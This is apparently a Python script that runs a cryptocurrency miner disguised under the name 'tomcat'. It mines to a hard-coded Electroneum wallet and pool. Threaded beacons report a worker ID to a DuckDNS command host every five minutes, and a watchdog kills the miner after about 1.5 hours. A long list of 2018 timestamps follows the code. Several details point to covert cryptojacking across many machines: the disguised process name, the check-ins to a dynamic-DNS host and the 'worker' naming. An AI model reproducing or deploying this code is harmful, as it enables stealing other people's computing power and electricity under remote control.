import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:02.214264
#2018-02-17 16:06:05.574294
#2018-02-17 17:55:07.632911
#2018-02-17 19:43:04.552921
#2018-02-17 21:30:08.359345
#2018-02-17 23:14:07.381238
#2018-02-18 01:01:02.029136
#2018-02-18 02:49:06.082191
#2018-02-18 04:38:05.765238
#2018-02-18 06:29:01.599364
#2018-02-18 08:17:04.782345
#2018-02-18 10:05:04.050901
#2018-02-18 11:51:04.998273
#2018-02-18 13:36:07.550164
#2018-02-18 15:26:04.300358
#2018-02-18 17:14:07.213631
#2018-02-18 19:02:04.116456
#2018-02-18 20:48:07.252182
#2018-02-18 22:34:07.617013
#2018-02-19 00:22:07.875502
#2018-02-19 02:09:06.622501
#2018-02-19 03:56:04.915377
#2018-02-19 05:40:06.612128
#2018-02-19 07:28:06.062341
#2018-02-19 09:18:05.162360
#2018-02-19 11:07:07.863308
#2018-02-19 12:54:06.861237
#2018-02-19 14:43:07.297435
#2018-02-19 16:31:07.924389
#2018-02-19 18:17:05.351673
#2018-02-19 20:03:04.612222
#2018-02-19 21:52:06.409224
#2018-02-19 23:38:05.431208
#2018-02-20 01:23:07.756735
#2018-02-20 03:13:05.680969
#2018-02-20 05:00:01.525017
#2018-02-20 06:43:01.568574
#2018-02-20 08:28:07.958316
#2018-02-20 10:13:03.573419
#2018-02-20 11:57:01.595750
#2018-02-20 13:43:13.631168
#2018-02-20 15:30:01.416034
#2018-02-20 17:17:08.458392
#2018-02-20 19:07:06.904744
#2018-02-20 20:57:03.799000
#2018-02-20 22:43:06.477273
#2018-02-21 00:26:01.266528
#2018-02-21 02:12:04.834535
#2018-02-21 04:01:03.883583
#2018-02-21 05:48:01.529713
#2018-02-21 07:37:02.099627
#2018-02-21 09:22:07.709184
#2018-02-21 11:09:06.288380
#2018-02-21 12:56:09.644331
#2018-02-21 14:45:12.896114
#2018-02-21 16:34:10.718466
#2018-02-21 18:25:09.582888
#2018-02-21 20:10:01.321247
#2018-02-21 21:58:06.304592
#2018-02-21 23:47:06.844104
#2018-02-22 01:38:01.812460
#2018-02-22 03:25:05.608911
#2018-02-22 05:11:05.575298
#2018-02-22 06:54:02.025089
#2018-02-22 08:43:05.403778
#2018-02-22 10:31:05.382637
#2018-02-22 12:17:05.078809
#2018-02-22 14:01:11.950461
#2018-02-22 15:49:02.143750
#2018-02-22 17:35:09.708458
#2018-02-22 19:21:04.454833
#2018-02-22 21:13:04.843463
#2018-02-22 22:57:07.263983
#2018-02-23 00:45:09.701024
#2018-02-23 02:34:05.559340
#2018-02-23 04:21:05.226305
#2018-02-23 06:07:04.509164
#2018-02-23 07:52:06.404134
#2018-02-23 10:09:04.167443
#2018-02-23 12:02:11.646622
#2018-02-23 13:49:07.838498
#2018-02-23 15:40:09.885067
#2018-02-23 17:27:06.250812
#2018-02-23 19:16:03.758076
#2018-02-23 21:00:13.179962
#2018-02-23 22:53:03.558983
#2018-02-24 00:38:07.470444
#2018-02-24 02:28:04.301349
#2018-02-24 04:18:06.671717
#2018-02-24 06:06:06.769715
#2018-02-24 07:53:02.115801
#2018-02-24 09:37:06.556110
#2018-02-24 11:31:06.974768
#2018-02-24 13:21:06.793577
#2018-02-24 15:10:09.469855
#2018-02-24 16:59:06.297981
#2018-02-24 18:47:03.898238
#2018-02-24 20:37:05.908019
#2018-02-24 22:42:07.193986
#2018-02-25 01:49:04.892619
#2018-02-25 05:00:01.730180
#2018-02-25 09:47:01.687551